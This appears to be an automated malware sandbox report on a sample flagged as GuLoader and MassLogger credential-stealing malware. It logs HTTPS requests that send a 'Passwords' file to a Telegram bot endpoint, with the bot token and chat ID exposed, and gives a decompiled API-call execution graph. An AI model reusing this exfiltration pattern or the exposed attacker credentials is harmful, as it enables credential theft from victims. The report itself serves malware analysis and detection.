                                                                                                                    2025-01-11 06:24:59 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 37 66 63 66 62 33 62 66 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd347fcfb3bfa5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:59 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:59 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:59 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43793,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576699,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    35192.168.2.450070149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:25:02 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd34bcf6e6755f
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:25:02 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 62 63 66 36 65 36 37 35 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd34bcf6e6755fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:25:02 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:25:02 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:25:02 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 37 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43794,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576702,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    36192.168.2.450072149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:25:12 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd35a148fe7d29
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    2025-01-11 06:25:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 61 31 34 38 66 65 37 64 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd35a148fe7d29Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:25:13 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:25:12 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:25:13 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 37 31 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43795,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576712,"document":{"file_n


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:01:23:04
                                                                                                                    Start date:11/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\grrezORe7h.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:465'972 bytes
                                                                                                                    MD5 hash:FD7D65A4A49C3867970510443C8819D5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.2135234912.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2135234912.00000000035B7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:01:23:43
                                                                                                                    Start date:11/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\grrezORe7h.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:465'972 bytes
                                                                                                                    MD5 hash:FD7D65A4A49C3867970510443C8819D5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2989457326.00000000016C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:false

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:21.4%
                                                                                                                      Dynamic/Decrypted Code Coverage:13.9%
                                                                                                                      Signature Coverage:20.8%
                                                                                                                      Total number of Nodes:1517
                                                                                                                      Total number of Limit Nodes:46
                                                                                                                      execution_graph 4779 10001000 4782 1000101b 4779->4782 4789 10001516 4782->4789 4784 10001020 4785 10001024 4784->4785 4786 10001027 GlobalAlloc 4784->4786 4787 1000153d 3 API calls 4785->4787 4786->4785 4788 10001019 4787->4788 4791 1000151c 4789->4791 4790 10001522 4790->4784 4791->4790 4792 1000152e GlobalFree 4791->4792 4792->4784 4793 402840 4794 402bbf 18 API calls 4793->4794 4796 40284e 4794->4796 4795 402864 4798 405c05 2 API calls 4795->4798 4796->4795 4797 402bbf 18 API calls 4796->4797 4797->4795 4799 40286a 4798->4799 4821 405c2a GetFileAttributesW CreateFileW 4799->4821 4801 402877 4802 402883 GlobalAlloc 4801->4802 4803 40291a 4801->4803 4806 402911 CloseHandle 4802->4806 4807 40289c 4802->4807 4804 402922 DeleteFileW 4803->4804 4805 402935 4803->4805 4804->4805 4806->4803 4822 403258 SetFilePointer 4807->4822 4809 4028a2 4810 403242 ReadFile 4809->4810 4811 4028ab GlobalAlloc 4810->4811 4812 4028bb 4811->4812 4813 4028ef 4811->4813 4814 403027 32 API calls 4812->4814 4815 405cdc WriteFile 4813->4815 4820 4028c8 4814->4820 4816 4028fb GlobalFree 4815->4816 4817 403027 32 API calls 4816->4817 4818 40290e 4817->4818 4818->4806 4819 4028e6 GlobalFree 4819->4813 4820->4819 4821->4801 4822->4809 4823 401cc0 4824 402ba2 18 API calls 4823->4824 4825 401cc7 4824->4825 4826 402ba2 18 API calls 4825->4826 4827 401ccf GetDlgItem 4826->4827 4828 402531 4827->4828 4829 4029c0 4830 402ba2 18 API calls 4829->4830 4831 4029c6 4830->4831 4832 4029f9 4831->4832 4834 40281e 4831->4834 4835 4029d4 4831->4835 4833 406077 18 API calls 4832->4833 4832->4834 4833->4834 4835->4834 4837 405f9c wsprintfW 4835->4837 4837->4834 4199 403c41 4200 403d94 4199->4200 4201 403c59 4199->4201 4203 403de5 4200->4203 4204 403da5 GetDlgItem GetDlgItem 4200->4204 4201->4200 4202 403c65 4201->4202 4206 403c70 SetWindowPos 4202->4206 4207 403c83 4202->4207 4205 403e3f 4203->4205 4213 401389 2 API calls 4203->4213 4208 404119 19 API calls 4204->4208 4209 404165 SendMessageW 4205->4209 4230 403d8f 4205->4230 4206->4207 4210 403ca0 4207->4210 4211 403c88 ShowWindow 4207->4211 4212 403dcf SetClassLongW 4208->4212 4242 403e51 4209->4242 4214 403cc2 4210->4214 4215 403ca8 DestroyWindow 4210->4215 4211->4210 4216 40140b 2 API calls 4212->4216 4217 403e17 4213->4217 4219 403cc7 SetWindowLongW 4214->4219 4220 403cd8 4214->4220 4218 4040c3 4215->4218 4216->4203 4217->4205 4223 403e1b SendMessageW 4217->4223 4229 4040d3 ShowWindow 4218->4229 4218->4230 4219->4230 4221 403d81 4220->4221 4222 403ce4 GetDlgItem 4220->4222 4279 404180 4221->4279 4226 403d14 4222->4226 4227 403cf7 SendMessageW IsWindowEnabled 4222->4227 4223->4230 4224 40140b 2 API calls 4224->4242 4225 4040a4 DestroyWindow EndDialog 4225->4218 4232 403d21 4226->4232 4233 403d68 SendMessageW 4226->4233 4234 403d34 4226->4234 4244 403d19 4226->4244 4227->4226 4227->4230 4229->4230 4231 406077 18 API calls 4231->4242 4232->4233 4232->4244 4233->4221 4237 403d51 4234->4237 4238 403d3c 4234->4238 4236 403d4f 4236->4221 4240 40140b 2 API calls 4237->4240 4241 40140b 2 API calls 4238->4241 4239 404119 19 API calls 4239->4242 4243 403d58 4240->4243 4241->4244 4242->4224 4242->4225 4242->4230 4242->4231 4242->4239 4260 403fe4 DestroyWindow 4242->4260 4270 404119 4242->4270 4243->4221 4243->4244 4276 4040f2 4244->4276 4246 403ecc GetDlgItem 4247 403ee1 4246->4247 4248 403ee9 ShowWindow KiUserCallbackDispatcher 4246->4248 4247->4248 4273 40413b EnableWindow 4248->4273 4250 403f13 EnableWindow 4253 403f27 4250->4253 4251 403f2c GetSystemMenu EnableMenuItem SendMessageW 4252 403f5c SendMessageW 4251->4252 4251->4253 4252->4253 4253->4251 4274 40414e SendMessageW 4253->4274 4275 406055 lstrcpynW 4253->4275 4256 403f8a lstrlenW 4257 406077 18 API calls 4256->4257 4258 403fa0 SetWindowTextW 4257->4258 4259 401389 2 API calls 4258->4259 4259->4242 4260->4218 4261 403ffe CreateDialogParamW 4260->4261 4261->4218 4262 404031 4261->4262 4263 404119 19 API calls 4262->4263 4264 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4263->4264 4265 401389 2 API calls 4264->4265 4266 404082 4265->4266 4266->4230 4267 40408a ShowWindow 4266->4267 4268 404165 SendMessageW 4267->4268 4269 4040a2 4268->4269 4269->4218 4271 406077 18 API calls 4270->4271 4272 404124 SetDlgItemTextW 4271->4272 4272->4246 4273->4250 4274->4253 4275->4256 4277 4040f9 4276->4277 4278 4040ff SendMessageW 4276->4278 4277->4278 4278->4236 4280 404198 GetWindowLongW 4279->4280 4290 404221 4279->4290 4281 4041a9 4280->4281 4280->4290 4282 4041b8 GetSysColor 4281->4282 4283 4041bb 4281->4283 4282->4283 4284 4041c1 SetTextColor 4283->4284 4285 4041cb SetBkMode 4283->4285 4284->4285 4286 4041e3 GetSysColor 4285->4286 4287 4041e9 4285->4287 4286->4287 4288 4041f0 SetBkColor 4287->4288 4289 4041fa 4287->4289 4288->4289 4289->4290 4291 404214 CreateBrushIndirect 4289->4291 4292 40420d DeleteObject 4289->4292 4290->4230 4291->4290 4292->4291 4293 401fc3 4294 401fd5 4293->4294 4304 402087 4293->4304 4316 402bbf 4294->4316 4296 401423 25 API calls 4302 4021e1 4296->4302 4298 402bbf 18 API calls 4299 401fe5 4298->4299 4300 401ffb LoadLibraryExW 4299->4300 4301 401fed GetModuleHandleW 4299->4301 4303 40200c 4300->4303 4300->4304 4301->4300 4301->4303 4322 40649a WideCharToMultiByte 4303->4322 4304->4296 4307 402056 4311 4051b4 25 API calls 4307->4311 4308 40201d 4309 402025 4308->4309 4310 40203c 4308->4310 4367 401423 4309->4367 4325 10001759 4310->4325 4313 40202d 4311->4313 4313->4302 4314 402079 FreeLibrary 4313->4314 4314->4302 4317 402bcb 4316->4317 4318 406077 18 API calls 4317->4318 4319 402bec 4318->4319 4320 401fdc 4319->4320 4321 4062e9 5 API calls 4319->4321 4320->4298 4321->4320 4323 4064c4 GetProcAddress 4322->4323 4324 402017 4322->4324 4323->4324 4324->4307 4324->4308 4326 10001789 4325->4326 4370 10001b18 4326->4370 4328 10001790 4329 100018a6 4328->4329 4330 100017a1 4328->4330 4331 100017a8 4328->4331 4329->4313 4419 10002286 4330->4419 4402 100022d0 4331->4402 4336 100017d7 4351 100017cd 4336->4351 4429 10002b5f 4336->4429 4337 100017be 4341 100017c4 4337->4341 4345 100017cf 4337->4345 4338 1000180c 4342 10001812 4338->4342 4343 1000184e 4338->4343 4339 100017ee 4432 100024a9 4339->4432 4341->4351 4413 100028a4 4341->4413 4347 100015b4 3 API calls 4342->4347 4349 100024a9 10 API calls 4343->4349 4344 100017f4 4443 100015b4 4344->4443 4423 10002645 4345->4423 4353 10001828 4347->4353 4354 10001840 4349->4354 4351->4338 4351->4339 4357 100024a9 10 API calls 4353->4357 4358 10001895 4354->4358 4454 1000246c 4354->4454 4356 100017d5 4356->4351 4357->4354 4358->4329 4362 1000189f GlobalFree 4358->4362 4362->4329 4364 10001881 4364->4358 4458 1000153d wsprintfW 4364->4458 4365 1000187a FreeLibrary 4365->4364 4368 4051b4 25 API calls 4367->4368 4369 401431 4368->4369 4369->4313 4461 1000121b GlobalAlloc 4370->4461 4372 10001b3c 4462 1000121b GlobalAlloc 4372->4462 4374 10001d7a GlobalFree GlobalFree GlobalFree 4375 10001d97 4374->4375 4392 10001de1 4374->4392 4376 100020ee 4375->4376 4385 10001dac 4375->4385 4375->4392 4378 10002110 GetModuleHandleW 4376->4378 4376->4392 4377 10001c1d GlobalAlloc 4395 10001b47 4377->4395 4380 10002121 LoadLibraryW 4378->4380 4381 10002136 4378->4381 4379 10001c86 GlobalFree 4379->4395 4380->4381 4380->4392 4469 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4381->4469 4382 10001c68 lstrcpyW 4383 10001c72 lstrcpyW 4382->4383 4383->4395 4385->4392 4465 1000122c 4385->4465 4386 10002188 4388 10002195 lstrlenW 4386->4388 4386->4392 4387 10002048 4387->4392 4396 10002090 lstrcpyW 4387->4396 4470 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4388->4470 4392->4328 4393 10002148 4393->4386 4401 10002172 GetProcAddress 4393->4401 4394 100021af 4394->4392 4395->4374 4395->4377 4395->4379 4395->4382 4395->4383 4395->4387 4395->4392 4397 10001cc4 4395->4397 4398 10001f37 GlobalFree 4395->4398 4400 1000122c 2 API calls 4395->4400 4468 1000121b GlobalAlloc 4395->4468 4396->4392 4397->4395 4463 1000158f GlobalSize GlobalAlloc 4397->4463 4398->4395 4400->4395 4401->4386 4410 100022e8 4402->4410 4404 10002415 GlobalFree 4408 100017ae 4404->4408 4404->4410 4405 100023d3 lstrlenW 4405->4404 4409 100023d1 4405->4409 4406 100023ba GlobalAlloc 4406->4409 4407 1000238f GlobalAlloc WideCharToMultiByte 4407->4404 4408->4336 4408->4337 4408->4351 4409->4404 4476 100025d9 4409->4476 4410->4404 4410->4405 4410->4406 4410->4407 4411 1000122c GlobalAlloc lstrcpynW 4410->4411 4472 100012ba 4410->4472 4411->4410 4415 100028b6 4413->4415 4414 1000295b VirtualAlloc 4416 10002979 4414->4416 4415->4414 4417 10002a75 4416->4417 4418 10002a6a GetLastError 4416->4418 4417->4351 4418->4417 4420 10002296 4419->4420 4421 100017a7 4419->4421 4420->4421 4422 100022a8 GlobalAlloc 4420->4422 4421->4331 4422->4420 4427 10002661 4423->4427 4424 100026b2 GlobalAlloc 4428 100026d4 4424->4428 4425 100026c5 4426 100026ca GlobalSize 4425->4426 4425->4428 4426->4428 4427->4424 4427->4425 4428->4356 4430 10002b6a 4429->4430 4431 10002baa GlobalFree 4430->4431 4479 1000121b GlobalAlloc 4432->4479 4434 10002530 StringFromGUID2 4436 100024b3 4434->4436 4435 10002541 lstrcpynW 4435->4436 4436->4434 4436->4435 4437 1000250b MultiByteToWideChar 4436->4437 4438 10002554 wsprintfW 4436->4438 4439 10002571 GlobalFree 4436->4439 4440 100025ac GlobalFree 4436->4440 4441 10001272 2 API calls 4436->4441 4480 100012e1 4436->4480 4437->4436 4438->4436 4439->4436 4440->4344 4441->4436 4484 1000121b GlobalAlloc 4443->4484 4445 100015ba 4446 100015c7 lstrcpyW 4445->4446 4448 100015e1 4445->4448 4449 100015fb 4446->4449 4448->4449 4450 100015e6 wsprintfW 4448->4450 4451 10001272 4449->4451 4450->4449 4452 100012b5 GlobalFree 4451->4452 4453 1000127b GlobalAlloc lstrcpynW 4451->4453 4452->4354 4453->4452 4455 1000247a 4454->4455 4456 10001861 4454->4456 4455->4456 4457 10002496 GlobalFree 4455->4457 4456->4364 4456->4365 4457->4455 4459 10001272 2 API calls 4458->4459 4460 1000155e 4459->4460 4460->4358 4461->4372 4462->4395 4464 100015ad 4463->4464 4464->4397 4471 1000121b GlobalAlloc 4465->4471 4467 1000123b lstrcpynW 4467->4392 4468->4395 4469->4393 4470->4394 4471->4467 4473 100012c1 4472->4473 4474 1000122c 2 API calls 4473->4474 4475 100012df 4474->4475 4475->4410 4477 100025e7 VirtualAlloc 4476->4477 4478 1000263d 4476->4478 4477->4478 4478->4409 4479->4436 4481 100012ea 4480->4481 4482 1000130c 4480->4482 4481->4482 4483 100012f0 lstrcpyW 4481->4483 4482->4436 4483->4482 4484->4445 4838 4016c4 4839 402bbf 18 API calls 4838->4839 4840 4016ca GetFullPathNameW 4839->4840 4841 4016e4 4840->4841 4842 401706 4840->4842 4841->4842 4845 406398 2 API calls 4841->4845 4843 40171b GetShortPathNameW 4842->4843 4844 402a4c 4842->4844 4843->4844 4846 4016f6 4845->4846 4846->4842 4848 406055 lstrcpynW 4846->4848 4848->4842 4849 4014cb 4850 4051b4 25 API calls 4849->4850 4851 4014d2 4850->4851 4852 40194e 4853 402bbf 18 API calls 4852->4853 4854 401955 lstrlenW 4853->4854 4855 402531 4854->4855 4856 4027ce 4857 4027d6 4856->4857 4858 4027da FindNextFileW 4857->4858 4861 4027ec 4857->4861 4859 402833 4858->4859 4858->4861 4862 406055 lstrcpynW 4859->4862 4862->4861 4682 401754 4683 402bbf 18 API calls 4682->4683 4684 40175b 4683->4684 4685 405c59 2 API calls 4684->4685 4686 401762 4685->4686 4687 405c59 2 API calls 4686->4687 4687->4686 4863 401d56 GetDC GetDeviceCaps 4864 402ba2 18 API calls 4863->4864 4865 401d74 MulDiv ReleaseDC 4864->4865 4866 402ba2 18 API calls 4865->4866 4867 401d93 4866->4867 4868 406077 18 API calls 4867->4868 4869 401dcc CreateFontIndirectW 4868->4869 4870 402531 4869->4870 4871 401a57 4872 402ba2 18 API calls 4871->4872 4873 401a5d 4872->4873 4874 402ba2 18 API calls 4873->4874 4875 401a05 4874->4875 4876 4014d7 4877 402ba2 18 API calls 4876->4877 4878 4014dd Sleep 4877->4878 4880 402a4c 4878->4880 4881 40155b 4882 4029f2 4881->4882 4885 405f9c wsprintfW 4882->4885 4884 4029f7 4885->4884 4761 401ddc 4762 402ba2 18 API calls 4761->4762 4763 401de2 4762->4763 4764 402ba2 18 API calls 4763->4764 4765 401deb 4764->4765 4766 401df2 ShowWindow 4765->4766 4767 401dfd EnableWindow 4765->4767 4768 402a4c 4766->4768 4767->4768 4886 40385c 4887 403867 4886->4887 4888 40386b 4887->4888 4889 40386e GlobalAlloc 4887->4889 4889->4888 4890 4022df 4891 402bbf 18 API calls 4890->4891 4892 4022ee 4891->4892 4893 402bbf 18 API calls 4892->4893 4894 4022f7 4893->4894 4895 402bbf 18 API calls 4894->4895 4896 402301 GetPrivateProfileStringW 4895->4896 4897 401bdf 4898 402ba2 18 API calls 4897->4898 4899 401be6 4898->4899 4900 402ba2 18 API calls 4899->4900 4901 401bf0 4900->4901 4902 401c00 4901->4902 4903 402bbf 18 API calls 4901->4903 4904 401c10 4902->4904 4905 402bbf 18 API calls 4902->4905 4903->4902 4906 401c1b 4904->4906 4907 401c5f 4904->4907 4905->4904 4909 402ba2 18 API calls 4906->4909 4908 402bbf 18 API calls 4907->4908 4910 401c64 4908->4910 4911 401c20 4909->4911 4912 402bbf 18 API calls 4910->4912 4913 402ba2 18 API calls 4911->4913 4914 401c6d FindWindowExW 4912->4914 4915 401c29 4913->4915 4918 401c8f 4914->4918 4916 401c31 SendMessageTimeoutW 4915->4916 4917 401c4f SendMessageW 4915->4917 4916->4918 4917->4918 4919 401960 4920 402ba2 18 API calls 4919->4920 4921 401967 4920->4921 4922 402ba2 18 API calls 4921->4922 4923 401971 4922->4923 4924 